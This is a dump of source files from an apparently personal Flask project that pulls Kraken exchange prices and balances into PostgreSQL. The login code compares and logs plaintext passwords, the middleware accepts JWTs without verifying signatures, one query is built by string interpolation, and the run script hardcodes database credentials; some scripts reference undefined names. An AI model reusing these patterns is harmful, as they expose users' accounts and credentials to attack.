"robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import krakenex\n\nfrom log import log\n\ndef get_kraken_api():\n api = krakenex.API()\n try:\n api.load_key(\"/etc/kraken-api.key\")\n except FileNotFoundError as e:\n log.error(f\"Could not load keyfile: {e}\")\n return False\n\n log.debug(\"Kraken API loaded successfully\")\n return api" }, { "alpha_fraction": 0.6085761189460754, "alphanum_fraction": 0.6107751727104187, "avg_line_length": 26.56818199157715, "blob_id": "e091198edf484007e12aa551255a87b644d19aba", "content_id": "f67289e9415417377d9eb0ece99441553aec9a6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3638, "license_type": "no_license", "max_line_length": 108, "num_lines": 132, "path": "/api/account.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import krakenex\n\nfrom flask import Blueprint\nfrom decimal import Decimal\n\nfrom auth import LoginManager\nfrom db import db\nfrom db.models import Ohlc\nfrom log import log\nfrom setup import get_kraken_api\nfrom portfolio import Portfolio\n\naccount_bp = Blueprint(\"account_bp\", __name__)\n\nlog.warning(\"Loading api.account\")\n\nlogin_manager = LoginManager()\n\n\ndef get_current_ticker_info(account: str = \"kraken\") -> dict:\n \"\"\"\n The ticker (current price) for a specific exchange.\n\n :return: JSON with ticker information\n \"\"\"\n\n if account == \"kraken\":\n\n kraken_api = krakenex.API()\n\n data = {\"pair\": [\"XXBTZEUR\"]}\n result = kraken_api.query_public(\"Ticker\", data=data)\n log.debug(result)\n return {\"account\": account, \"XXBTZEUR\": result[\"c\"][0]}\n\n\n\n if account == \"local\":\n record = (\n db.session()\n .query(Ohlc)\n .filter(Ohlc.interval == 1)\n .order_by(Ohlc.endtime.desc())\n .limit(1)\n .one_or_none()\n )\n\n if record:\n return {\"account\": account, \"XXBTZEUR\": record.close}\n else:\n return {\"error\": \"no data available\"}\n\n else:\n log.error(\"get_current_ticker_info(): No valid account given.\")\n return {\"error\": \"No valid account\"}\n\n\n@account_bp.route(\"/balance\", methods=[\"GET\", \"POST\", \"OPTIONS\"])\n@login_manager.token_required\ndef api_balance():\n \"\"\"\n Get the total balance and the open 
balance available for trading.\n :return:\n \"\"\"\n api = get_kraken_api()\n print(\"BALANCE!\")\n if not api:\n return {\"error\": \"Could not load Kraken API, check log.\"}\n\n log.debug(\"Getting account balance\")\n balance = dict()\n balance[\"total\"] = api.query_private(\"Balance\")[\"result\"]\n balance[\"total\"] = correct_currency_in_dictionary(balance[\"total\"])\n\n log.debug(\"Getting open orders\")\n open_orders = api.query_private(\"OpenOrders\")\n\n print(f\"DEBUG: {open_orders}\")\n open_orders = open_orders[\"result\"]\n # Make a copy of the total dict, so we can calculate\n # the remaining balance available for trading on this\n # copy.\n balance[\"available\"] = dict()\n balance[\"available\"] = balance[\"total\"].copy() # Leave total balance intact.\n\n log.debug(\"Calculating balance available for trades\")\n for order_id, order in open_orders[\"open\"].items():\n volume = Decimal(order['vol']) - Decimal(order['vol_exec'])\n log.debug(volume)\n\n descr = order[\"descr\"]\n pair = descr[\"pair\"]\n price = Decimal(descr[\"price\"])\n\n base = pair[:3] if pair != \"DASHEUR\" else \"DASH\"\n quote = pair[3:] if pair != \"DASHEUR\" else \"EUR\"\n\n if descr[\"type\"] == \"buy\":\n balance[\"available\"][quote] -= volume * price\n\n if descr[\"type\"] == \"sell\":\n balance[\"available\"][base] -= volume\n\n return {\n \"balance\": balance,\n \"error\": \"\"\n }\n\n\n@account_bp.route(\"/portfolio\", methods=[\"POST\", \"OPTIONS\"])\n@login_manager.token_required\ndef portfolio():\n p = Portfolio()\n return p.get_summary()\n\n\n@account_bp.route(\"/trades\", methods=[\"POST\", \"OPTIONS\"])\n@login_manager.token_required\ndef trades():\n return {\"trades\": []}\n\n\ndef correct_currency_in_dictionary(dictionary):\n \"\"\"\n Correct the currency in a dictionary to a 3 letter key.\n XXBT => XBT, ZEUR => EUR, except with DASH which stays\n the same.\n :param dictionary:\n :return: dictionary with correct keys\n \"\"\"\n log.debug(\"Correcting currency in dictionary\")\n return {key[1:]: Decimal(value) for key, value in dictionary.items() if len(key) == 4 and key != \"DASH\"}" }, { "alpha_fraction": 0.5323799252510071, "alphanum_fraction": 0.5372369289398193, "avg_line_length": 27.90625, "blob_id": "f5a3dc8d0e6ae32fb81dd9a1ec579a92059bd6f0", "content_id": "d03c2bc6139e5b8f77c57b4f0b47dd1169aeaa9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3706, "license_type": "no_license", "max_line_length": 92, "num_lines": 128, "path": "/auth/__init__.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from datetime import datetime\nfrom uuid import uuid4\n\nimport simplejson as json\nfrom functools import wraps\nfrom flask import request, g\nfrom sqlalchemy import and_\n\nfrom log import log\nfrom db import db\nfrom db.models import Users, Tokens\n\n\nclass LoginManager(object):\n\n def token_required(self, f):\n\n @wraps(f)\n def wrapper(*args, **kwargs):\n print(request.data)\n token = request.data.get('token', False)\n username = request.data.get(\"username\", False)\n log.debug(token)\n log.debug(username)\n if not token or not username:\n return {\"error\": \"not authenticated!\"}\n\n validation = self.validate_token(token, username)\n\n if validation == \"expired\":\n return {\"error\": \"token expired\"}\n\n if validation == \"invalid\":\n return {\"error\": \"not authenticated\"}\n\n if validation == \"valid\":\n return f(*args, **kwargs)\n\n return wrapper\n\n def validate_token(self, 
token, username):\n record = db.session().query(Tokens).join(Users, Users.name == username).filter(\n Tokens.token == token\n ).one_or_none()\n\n if record is None:\n log.debug(\"Invalid token\")\n return \"invalid\"\n\n if record.ttl_max is None:\n log.debug(\"Invalid token, ttl_max is None\")\n return \"expired\"\n\n if datetime.now() > record.ttl_max:\n log.debug(f\"Token expired (was valid until: {record.ttl_max}), removing token.\")\n self.logout()\n return \"expired\"\n\n try:\n record.timestamp = datetime.now()\n db.session().commit()\n except Exception as e:\n log.error(f\"Could not update token: {e}\")\n return \"invalid\"\n\n log.debug(\"Token Valid\")\n return \"valid\"\n\n @staticmethod\n def logout():\n\n token = request.data.get('token', False)\n username = request.data.get(\"username\", False)\n\n record = db.session().query(Tokens).join(Users, Users.name == username).filter(\n Tokens.token == token\n ).one_or_none()\n\n if record is None:\n return False\n\n try:\n log.debug(f\"Removing token '{token}' for user '{username}'\")\n db.session().delete(record)\n db.session().commit()\n return True\n except Exception as e:\n log.error(f\"{e}\")\n return False\n\n def login(self):\n username = request.data.get(\"username\", False)\n password = request.data.get(\"password\", False)\n\n log.debug(f\"username: {username}\")\n log.debug(f\"password: {password}\")\n\n if not username or not password:\n return {\"error\": \"invalid credentials\"}\n\n user = db.session().query(Users).filter(\n and_(\n Users.name == username,\n Users.password == password\n )\n ).one_or_none()\n\n if not user:\n return {\"error\": \"invalid credentials\"}\n\n else:\n token = Tokens()\n token.ttl_max = \"2021-12-12 12:00:00\"\n token.token = self.generate_token()\n token.user = user\n token.timestamp = datetime.now()\n token.ttl_increment = 60\n try:\n db.session().add(token)\n db.session().commit()\n return {\"token\": token.token}\n except Exception as e:\n log.error(f\"Could not create token: {e}\")\n return {\"error\": \"could not create token\"}\n\n @staticmethod\n def generate_token():\n return uuid4()\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5488325953483582, "alphanum_fraction": 0.5557382702827454, "avg_line_length": 25.20689582824707, "blob_id": "3393204f54a9bf48e551a7549aff8d35ec644e10", "content_id": "73c5843cdb9f2da5b9ee8e8c15f523f1a0e349e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3041, "license_type": "no_license", "max_line_length": 90, "num_lines": 116, "path": "/portfolio.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from pprint import pprint\nfrom setup import get_kraken_api\nfrom log import log\n\nclass Singleton(type):\n\n _instances = {}\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n\nclass Portfolio(metaclass=Singleton):\n\n def __init__(self, base_currency = \"EUR\"):\n\n self._api = get_kraken_api()\n self.base = base_currency\n self.assets = list()\n self.amounts = dict()\n self.prices = dict()\n\n self.update_assets()\n self.update_price()\n\n def update_assets(self):\n log.debug(\"Update Assets\")\n balance = self._api.query_private(\"Balance\")\n\n for asset in balance[\"result\"].items():\n self.amounts[asset[0][1:]] = float(asset[1])\n if asset[0][0] == \"Z\": self.base = asset[0][1:]\n if asset[0][0] == \"X\": self.assets.append(asset[0][1:])\n\n 
def update_price(self):\n log.debug(\"Update Price\")\n if len(self.assets) == 0:\n self.update_assets()\n\n pairs = [f\"X{a}Z{self.base}\" for a in self.assets]\n\n for p in pairs:\n ticker = self._api.query_public('Ticker', {'pair': p})\n self.prices[p[1:4]] = float(ticker[\"result\"][p][\"c\"][0])\n\n\n def trades_history(self, type=None):\n result = self._api.query_private('TradesHistory')\n\n trades = result[\"result\"][\"trades\"]\n\n fee: float = 0.0\n for trade in trades.values():\n fee += float(trade[\"fee\"])\n print(fee)\n return trades\n\n def price_history(self, pair=None):\n pass\n\n @property\n def asset_amounts(self):\n return {x:self.amounts[x] for x in self.assets}\n\n @property\n def asset_value(self):\n values = dict()\n\n for x in self.assets:\n values[x] = self.prices[x] * self.amounts[x]\n\n return values\n\n @property\n def base_value(self):\n return self.amounts[self.base]\n\n\n @property\n def pairs(self):\n return [f\"{x}/{self.base}\" for x in self.assets]\n\n @property\n def total_value(self):\n return {self.base: sum(self.asset_value.values()) + self.base_value}\n\n def get_summary(self, update_assets=False):\n\n if update_assets: self.update_assets()\n\n self.update_price()\n\n summary = dict()\n summary[\"assets\"] = {x: dict() for x in self.assets}\n for x in summary[\"assets\"].keys():\n summary[\"assets\"][x] = {\n \"amount\": round(self.asset_amounts[x],6),\n \"value\": round(self.asset_value[x], 6)\n }\n\n summary[\"base_asset\"] = self.base\n summary[\"base_amount\"] = round(self.amounts[self.base],6)\n summary[\"total_value\"] = round(sum(self.asset_value.values()) + self.base_value,6)\n\n return summary\n\n def __str__(self):\n return str(self.get_summary())\n\n\nif __name__ == \"__main__\":\n p = Portfolio()\n pprint(p.get_summary())\n print(p)\n\n" }, { "alpha_fraction": 0.758169949054718, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 29.600000381469727, "blob_id": "39c981d68e2d3fab2ae7e7a689242b8c4effc492", "content_id": "70416fde0c650cfecb8cd7f435567f1dc6d71e90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 153, "license_type": "no_license", "max_line_length": 59, "num_lines": 5, "path": "/run", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "#!/bin/bash\nexport DATABASE_URL='postgresql://rvl:rvl@localhost/kraken'\nexport APP_SETTINGS='development'\nsource ./venv/bin/activate\npython3 ./app.py -a\n" }, { "alpha_fraction": 0.6117045879364014, "alphanum_fraction": 0.6191360950469971, "avg_line_length": 22.40217399597168, "blob_id": "92e96a61379d1d79b4cca6292aac9b1fbe3830af", "content_id": "ea53a71d062656a71da967c8f40ec887100d5f43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2153, "license_type": "no_license", "max_line_length": 81, "num_lines": 92, "path": "/scripts.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import logging\nimport sys\n\nimport requests\n\nfrom datetime import datetime\n\nfrom app import app, db\n\nlogging.basicConfig()\nlogging.getLogger(__name__).setLevel(logging.DEBUG)\nlog = logging.getLogger(__name__)\n\nlog.debug(\"Retrieving rates.\")\n\n\ndef get_kraken_ohlc(interval=1, since=0, pair=\"XXBTZEUR\"):\n data = dict()\n\n if since != 0:\n data[\"since\"] = since\n if interval != 0:\n data[\"interval\"] = interval\n data[\"pair\"] = pair\n\n\n response = requests.post(data=data, url=url)\n\n return response.json()\n\n\ndef 
get_last_ohlc_timestamp(interval: int):\n\n last_open_ohlc = (\n db.session.query(OhlcXXBTZEUR)\n .filter(OhlcXXBTZEUR.interval == interval)\n .order_by(OhlcXXBTZEUR.timestamp.desc())\n .first()\n )\n\n return last_open_ohlc\n\n\ndef fill_interval(interval=1, pair=\"XXBTZEUR\"):\n\n last_record = get_last_ohlc_timestamp(interval=interval)\n if last_record is not None:\n since = last_record.unixtime\n else:\n since = 0\n\n data = get_kraken_ohlc(since=since, interval=interval, pair=pair)\n log.debug(f'Got {len(data[\"result\"][pair])} records')\n for record in data[\"result\"][pair]:\n\n r = OhlcXXBTZEUR()\n r.interval = interval\n r.unixtime = record[0]\n r.timestamp = datetime.fromtimestamp(record[0])\n r.open = record[1]\n r.high = record[2]\n r.low = record[3]\n r.close = record[4]\n r.vwap = record[5]\n r.count = record[6]\n\n # If the kraken record matches the last record\n # in the database, replace the one in the db\n\n if last_record is not None and r.unixtime == last_record.unixtime:\n log.debug(f\"Removing record w timestamp: {last_record.timestamp}\")\n db.session.delete(last_record)\n db.session.commit()\n\n log.debug(f\"Adding record for timestamp: {r.timestamp} close: {r.close}\")\n\n db.session.add(r)\n db.session.commit()\n\n\nwith app.app_context():\n\n try:\n interval = sys.argv[1]\n except IndexError:\n interval = 1\n\n db.init_app(app)\n\n kraken_rest_api_to_psql(interval)\n\n fill_interval(interval)\n" }, { "alpha_fraction": 0.503164529800415, "alphanum_fraction": 0.700421929359436, "avg_line_length": 16.08108139038086, "blob_id": "86415417c57703257a1c52f065bc9995ad1597ad", "content_id": "8fddbf46b24e24060996d1d467ba3c36172c0bf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1896, "license_type": "no_license", "max_line_length": 25, "num_lines": 111, "path": "/requirements.txt", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": 
"alembic==1.0.11\nappdirs==1.4.3\nasn1crypto==0.24.0\nattrs==18.2.0\nautobahn==20.12.3\nAutomat==0.7.0\nbackcall==0.1.0\nblack==19.3b0\nbleach==3.3.0\ncertifi==2019.6.16\ncffi==1.11.5\nchardet==3.0.4\nClick==7.0\ncoloredlogs==10.0\ncolorlog==4.0.2\nconstantly==15.1.0\ncryptography==3.3.2\ncycler==0.10.0\ndecorator==4.4.0\ndefusedxml==0.6.0\ndocopt==0.6.2\nentrypoints==0.3\nFlask==1.0.2\nFlask-API==1.1\nFlask-Cors==3.0.8\nFlask-Migrate==2.5.2\nFlask-Script==2.0.6\nFlask-SQLAlchemy==2.3.2\ngunicorn==19.9.0\nhumanfriendly==4.18\nhyperlink==18.0.0\nidna==2.8\nincremental==17.5.0\nipykernel==5.1.1\nipython==7.6.1\nipython-genutils==0.2.0\nipywidgets==7.5.0\nitsdangerous==1.1.0\njedi==0.14.1\nJinja2==2.11.3\njsonschema==3.0.1\njupyter==1.0.0\njupyter-client==5.3.1\njupyter-console==6.0.0\njupyter-core==4.5.0\nkiwisolver==1.1.0\nkraken-wsclient-py==0.0.4\nkrakenex==2.1.0\nMako==1.0.13\nMarkupSafe==1.1.1\nmatplotlib==3.1.1\nmistune==0.8.4\nmock==3.0.5\nmpl-finance==0.10.0\nnbconvert==5.5.0\nnbformat==4.4.0\nnose==1.3.7\nnotebook==6.1.5\nnumexpr==2.6.9\nnumpy==1.16.4\norca==1.5.1\npandas==0.25.0\npandocfilters==1.4.2\nparso==0.5.1\npexpect==4.7.0\npickleshare==0.7.5\nplotly==4.1.0\nprometheus-client==0.7.1\nprompt-toolkit==2.0.9\npsutil==5.6.6\npsycopg2==2.8.3\nptyprocess==0.6.0\npyasn1==0.4.5\npyasn1-modules==0.2.3\npycosat==0.6.3\npycparser==2.19\nPygments==2.7.4\nPyHamcrest==1.9.0\nPyJWT==1.7.1\npyOpenSSL==18.0.0\npyparsing==2.4.0\npyrsistent==0.15.3\npython-dateutil==2.8.0\npython-editor==1.0.4\npytz==2019.1\npyzmq==18.0.2\nqtconsole==4.5.1\nrequests==2.22.0\nretrying==1.3.3\nruamel.yaml==0.16.1\nruamel.yaml.clib==0.1.2\nSend2Trash==1.5.0\nservice-identity==18.1.0\nsimplejson==3.16.0\nsix==1.12.0\nSQLAlchemy==1.3.5\ntables==3.5.2\nterminado==0.8.2\ntestpath==0.4.2\ntoml==0.10.0\ntoolz==0.10.0\ntornado==6.0.3\ntraitlets==4.3.2\nTwisted==20.3.0\ntxaio==18.8.1\nurllib3==1.25.3\nwcwidth==0.1.7\nwebencodings==0.5.1\nWerkzeug==0.15.4\nwidgetsnbextension==3.5.0\nzope.interface==4.6.0\n" }, { "alpha_fraction": 0.8085106611251831, "alphanum_fraction": 0.8085106611251831, "avg_line_length": 18, "blob_id": "bd2f7eabb9bee54a99abaaaf87d3893480cb4776", "content_id": "7abdda048571394516078e34831f5c1159597989", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 39, "num_lines": 5, "path": "/db/__init__.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from flask_sqlalchemy import SQLAlchemy\n\nfrom app import app\n\ndb: SQLAlchemy = SQLAlchemy(app)" }, { "alpha_fraction": 0.6060869693756104, "alphanum_fraction": 0.6139130592346191, "avg_line_length": 30.08108139038086, "blob_id": "07d3ddd9554ac92082471083e58bdd2914e6672a", "content_id": "9e2dcbd1cb66df6635833cf33f47e23c280a39af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1150, "license_type": "no_license", "max_line_length": 64, "num_lines": 37, "path": "/app-test.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import unittest\nimport os\n\nfrom app import app, db\n\nTEST_DB = 'kraken-api.db'\n\nclass BasicTestCase(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Set up a blank temp database before each test\"\"\"\n basedir = os.path.abspath(os.path.dirname(__file__))\n app.config['TESTING'] = True\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \\\n os.path.join(basedir, TEST_DB)\n self.app = app.test_client()\n 
db.create_all()\n\n def tearDown(self):\n \"\"\"Destroy blank temp database after each test\"\"\"\n db.drop_all()\n\n def test_index(self):\n \"\"\"initial test. ensure flask was set up correctly\"\"\"\n tester = app.test_client(self)\n response = tester.get('/', content_type='text/html')\n self.assertEqual(response.status_code, 200)\n\n def test_database(self):\n \"\"\"initial test. ensure that the database exists\"\"\"\n tester = os.path.exists(\"kraken-api.db\")\n self.assertTrue(tester)\n\n def test_latest_gets_200(self):\n tester = app.test_client()\n response = tester.get('/latest')\n self.assertEqual(response.status_code, 200)\n" }, { "alpha_fraction": 0.5399869680404663, "alphanum_fraction": 0.5604681372642517, "avg_line_length": 31.04166603088379, "blob_id": "18cc7de57ce62a4d8c65e2413ee1a71b3ce43754", "content_id": "4c41f826c503780fd4b1cbb99a3e57e107aa4a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3076, "license_type": "no_license", "max_line_length": 152, "num_lines": 96, "path": "/kraken_inspect.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import time\nfrom decimal import Decimal as D\nfrom db.models import Ticker\nfrom db import db\nfrom log import log\n\ndef get_latest_ticker(interval=0):\n\n if interval == 0:\n record = db.session().query(Ticker).order_by(Ticker.timestamp.desc()).limit(1).one_or_none()\n return record\n\n else:\n query = f\"SELECT * FROM ticker WHERE to_timestamp(timestamp) > now() - interval '{interval} seconds'\"\n result = db.engine.execute(query)\n data = [x for x in result]\n\n return data\n\ndef run():\n\n warn_active_interval = 10\n warn_active_min_trades = 20\n warn_active_min_diff = D(25.0)\n\n log.info(f\"Setting up warning for active trades:\")\n log.info(f\"Interval : {warn_active_interval}\")\n log.info(f\"Max trades: {warn_active_min_trades}\")\n log.info(f\"Max diff : {warn_active_min_diff}\")\n log.info(\"------------------------------------------\")\n\n lws = 0.00\n while True:\n lws = warn_active_trading(\n interval=warn_active_interval,\n min_trades=warn_active_min_trades,\n min_diff=warn_active_min_diff,\n last_warning_timestamp=lws\n )\n time.sleep(1)\n\n\ndef warn_active_trading(\n interval: int=60,\n min_trades: int=5,\n min_diff: int=D(1.0),\n last_warning_timestamp=0.00):\n\n \"\"\"\n Warn if rapid fluctuations in price occur.\n\n Shows message if in the last {interval} seconds more than {min_trades} are being\n made, with a diffence greater than {min_diff} within this time.\n\n :param interval:\n :param min_trades:\n :param min_diff:\n :param last_warning_timestamp:\n :return:\n \"\"\"\n\n data = get_latest_ticker(interval)\n\n if len(data) == 0:\n log.debug(\"{a:19s} | | 0 trades | Tumbleweeds on tradingfloor... \".format(a=time.strftime ('%Y-%m-%d %H:%M:%S', time.localtime())))\n return -1.00\n\n if len(data) == 1:\n log.debug(\"{a:19s} | {b:10f} | 1 trade | Tumbleweeds on tradingfloor... 
\".format(\n a=time.strftime ('%Y-%m-%d %H:%M:%S', time.localtime(data[0]['timestamp'])),\n b=data[-1]['c_price'],\n c=len(data)\n ))\n return -1.00\n\n measured_diff = data[-1]['c_price'] - data[0]['c_price']\n\n log.debug(\"{a:19s} | {b:10f} | {c:3d} trades | diff {d:10f} | interval:{e:3d} | {f:18f} |\"\n .format(\n a=time.strftime ('%Y-%m-%d %H:%M:%S', time.localtime(data[0]['timestamp'])),\n b=data[-1]['c_price'],\n c=len(data),\n d=measured_diff,\n e=interval,\n f=data[-1]['timestamp']\n )\n )\n\n if len(data) >= min_trades and abs(measured_diff) > min_diff and data[-1]['timestamp'] != last_warning_timestamp:\n\n if measured_diff > 0:\n log.info(f\"Active UP trading, diff = {measured_diff}, buy @ {data[-1]['c_price']} | {data[-1]['timestamp']}\")\n if measured_diff < 0:\n log.error(f\"Active DOWN trading, diff = {measured_diff} sell @ {data[-1]['c_price']} | {data[-1]['timestamp']}\")\n\n return data[-1][\"timestamp\"]\n" }, { "alpha_fraction": 0.6654040217399597, "alphanum_fraction": 0.6679292917251587, "avg_line_length": 26.34482765197754, "blob_id": "0657af2cec22f0b35e260a76d2f18d62c8cf9bd0", "content_id": "2a1afc66c166d75008c7d8fc4778f8a2432872f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 792, "license_type": "no_license", "max_line_length": 78, "num_lines": 29, "path": "/api/ohlc.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import krakenex\n\nfrom flask import Blueprint\nfrom decimal import Decimal\nfrom auth import LoginManager\nfrom db import db\nfrom db.models import Ohlc\nfrom log import log\nfrom setup import get_kraken_api\n\nohlc_bp = Blueprint(\"ohlc_bp\", __name__)\n\nlog.warning(\"Loading api.account\")\nlogin_manager = LoginManager()\n\napi = get_kraken_api()\n\n@ohlc_bp.route(\"ohlc/<int:ohlc_interval>\", methods=[\"GET\", \"POST\", \"OPTIONS\"])\ndef ohlc_data(ohlc_interval: int, limit: int = 50):\n log.debug(f\"Retrieving OHLC data ({ohlc_interval} minutes interval)\")\n data = [x.as_canvasjs_datapoints() for x in\n db.session()\n .query(Ohlc)\n .filter(Ohlc.interval == ohlc_interval)\n .order_by(Ohlc.endtime.desc())\n .limit(limit)\n ]\n print(data)\n return data" }, { "alpha_fraction": 0.5835411548614502, "alphanum_fraction": 0.5835411548614502, "avg_line_length": 16.434782028198242, "blob_id": "f16c30e541e7c225392e434f2d69fbc531796f46", "content_id": "2631c647bddb52508cab8c3b2bb737326d153e15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 401, "license_type": "no_license", "max_line_length": 56, "num_lines": 23, "path": "/errors.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from log import log\n\n\nclass APIError(object):\n\n def json_error(self):\n return {\n \"error\": self.msg\n }\n\n\nclass CredentialsError(APIError):\n\n def __init__(self, msg=\"Generic Credentials Error\"):\n log.error(msg)\n self.msg = msg\n\n\nclass GenericApiError(APIError):\n\n def __init__(self, msg=\"Generic API Error\"):\n log.error(msg)\n self.msg = msg\n" }, { "alpha_fraction": 0.5388396978378296, "alphanum_fraction": 0.5486725568771362, "avg_line_length": 26.486486434936523, "blob_id": "3ff88bf67cd1822b0b1c5e0b35dc231dfdc27def", "content_id": "b3e69b9c3f447eb4f7d0f897324a0dcc48a0dc7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1017, "license_type": "no_license", "max_line_length": 74, "num_lines": 37, "path": 
"/api/middleware.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import simplejson as json\n\nfrom functools import wraps\nfrom flask import g\nfrom jwt import decode, exceptions\nfrom flask import request\n\nfrom log import log\n\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n log.debug(\"Checking token\")\n authorization = request.headers.get(\"authorization\", None)\n if not authorization:\n return (\n json.dumps({\"error\": \"no authorization token provided\"}),\n 403,\n {\"Content-type\": \"application/json\"},\n )\n\n try:\n token = authorization.split(\" \")[1]\n resp = decode(token, None, verify=False, algorithms=[\"HS256\"])\n log.info(resp)\n g.user = resp[\"sub\"]\n except exceptions.DecodeError as e:\n return (\n json.dumps({\"error\": \"invalid authorization token\"}),\n 403,\n {\"Content-type\": \"application/json\"},\n )\n\n return f(*args, **kwargs)\n\n return wrap\n" }, { "alpha_fraction": 0.5212847590446472, "alphanum_fraction": 0.5373438596725464, "avg_line_length": 28.61132049560547, "blob_id": "5f98f3c0aef30e232e5be4515e9c4a3fcb9e77a4", "content_id": "843e44b93fad13f4a9f4efa943ca6a8060a2fbb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7858, "license_type": "no_license", "max_line_length": 93, "num_lines": 265, "path": "/kraken_websocket.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import datetime\nimport sys\n\nimport requests\nfrom kraken_wsclient_py import kraken_wsclient_py as kraken_client\nfrom sqlalchemy import and_, exists\nfrom sqlalchemy.orm import Session\n\nfrom log import log\nfrom db import db\nfrom db.models import Ticker, Ohlc\nfrom portfolio import Portfolio\n\nsubscriptions: dict = dict()\n\n\ndef kraken_rest_api_to_psql(interval=1, pair=\"XXBTZEUR\"):\n\n log.info(\n f\"Retrieving past data for {pair} with interval {interval} from kraken REST Api\"\n )\n\n url: str = f\"https://api.kraken.com/0/public/OHLC?pair={pair}&interval={interval}\"\n\n data: dict = dict()\n data[\"interval\"] = interval\n data[\"pair\"] = pair\n\n result: dict = requests.post(data=data, url=url).json()\n\n num_kraken_records: int = len(result[\"result\"][pair])\n\n log.info(f\"Got {num_kraken_records} records\")\n\n session: Session = db.session()\n c: int = 0\n for record in result[\"result\"][pair]:\n\n existing_record = session.query(\n exists().where(\n and_(\n Ohlc.begintime == record[0],\n Ohlc.interval == interval\n ))\n ).scalar()\n\n if not existing_record:\n\n r = Ohlc()\n r.interval = interval\n r.pair = \"XBT/EUR\"\n r.begintime = record[0]\n r.endtime = float(record[0]) + (interval * 60.0)\n r.open = record[1]\n r.high = record[2]\n r.low = record[3]\n r.close = record[4]\n r.vwap = record[5]\n r.count = record[6]\n\n try:\n db.session().add(r)\n db.session.commit()\n\n except Exception as e:\n db.session.rollback()\n log.warning(f\"Failure inserting record: {e}\")\n else:\n c += 1\n\n log.info(f\"{c} record(s) skipped, {num_kraken_records - c} record(s) added.\")\n log.info(\"Done.\")\n\n\ndef store2psql(data):\n \"\"\"\n Store data to the porstgresql database\n :param data: result from websocket\n :return:\n \"\"\"\n if type(data) is list:\n handler: callable = getattr(\n sys.modules[__name__],\n f\"handle_{subscriptions[data[0]]['meta']['name']}_data\",\n )\n handler(data, **{\"channelId\": data[0]})\n\n if type(data) is dict and data.get(\"event\", \"\") == \"systemStatus\":\n 
log.info(\"------------------------------------------------------\")\n log.info(f\"Connection ID = {data.get('connectionID')}\")\n log.info(f\"System Status = {data.get('status')}\")\n log.info(f\"System Version = {data.get('version')}\")\n log.info(\"------------------------------------------------------\")\n\n if type(data) is dict and data.get(\"event\", \"\") == \"subscriptionStatus\":\n log.info(f\"Channel ID = {data.get('channelID')}\")\n log.info(f\"Channel Name = {data.get('subscription').get('name')}\")\n log.info(f\"Subscription Pair = {data.get('pair')}\")\n log.info(f\"Subscription Status = {data.get('status')}\")\n if data.get(\"status\") == \"error\":\n log.error(f\"Error message = {data.get('errorMessage')}\")\n\n log.info(\"------------------------------------------------------\")\n\n subscriptions[data.get(\"channelID\")] = {\n \"meta\": data.get(\"subscription\"),\n \"pair\": data.get(\"pair\"),\n }\n\n if type(data) is dict and data.get(\"event\") == \"heartbeat\":\n print(\"\\u2665\", end=\"\")\n sys.stdout.flush()\n\n\ndef handle_ticker_data(data, **kwargs):\n\n record = Ticker()\n\n record.a_price = data[1][\"a\"][0]\n record.a_whole_lot_volume = data[1][\"a\"][1]\n record.a_lot_volume = data[1][\"a\"][2]\n\n record.b_price = data[1][\"b\"][0]\n record.b_whole_lot_volume = data[1][\"b\"][1]\n record.b_lot_volume = data[1][\"b\"][2]\n\n record.c_price = data[1][\"c\"][0]\n record.c_lot_volume = data[1][\"c\"][1]\n\n record.v_today = data[1][\"v\"][0]\n record.v_24_hours = data[1][\"v\"][1]\n\n record.p_today = data[1][\"p\"][0]\n record.p_24_hours = data[1][\"p\"][1]\n\n record.t_today = data[1][\"t\"][0]\n record.t_24_hours = data[1][\"t\"][1]\n\n record.l_today = data[1][\"l\"][0]\n record.l_24_hours = data[1][\"l\"][1]\n\n record.o_today = data[1][\"o\"][0]\n record.o_24_hours = data[1][\"o\"][1]\n\n record.pair = data[3]\n\n record.timestamp = datetime.datetime.now().timestamp()\n 